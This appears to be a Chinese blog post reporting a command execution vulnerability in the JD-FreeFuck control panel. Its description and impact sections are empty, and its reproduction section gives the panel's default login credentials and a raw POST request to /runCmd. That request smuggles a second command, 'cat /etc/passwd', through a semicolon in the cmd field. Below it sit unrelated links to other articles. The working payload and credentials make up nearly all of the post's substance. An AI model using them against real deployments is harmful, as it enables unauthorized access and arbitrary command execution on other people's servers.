0
点赞
收藏
分享

微信扫一扫

JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞

点亮自己的那盏灯 2022-04-22 阅读 34
安全

漏洞描述

漏洞影响

空间测绘

漏洞复现

  • 访问后登录页面如下

image-20220422224258613

  • ✅ 默认账号useradmin/supermanito
POST /runCmd HTTP/1.1

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

image-20220422224428337

个人博客

举报

相关推荐

控制面板没有mysql

MySQLUserci数据库

windowsMobile控制面板的调用

windowsmobileappletinputbytewindows

godaddy设置方法 控制面板

phpJava后端开发

win工具/控制面板集合

工具divfunctionshellcmdHtml/CSS前端开发

控制面板及常用设置

时间设置屏幕分辨率日期选择Windows系统/运维

Github上 10 个开源免费且优秀的后台控制面板

分享推荐UI原型设计软件开发【】更多测试问题微服务应用20300.编码积累别动我的代码php

VPS 控制面板简介与选择指南

服务器服务器管理Web运维

BY分销模板控制面板带会员中心

后台管理Html/CSS前端开发

通过控制面板开启子系统功能

PowerShellWindows发行版物联网yyds干货盘点

【微服务~Sentinel】Sentinel之dashboard控制面板

云原生原力计划微服务SentinelspringcloudLinux系统/运维
0 条评论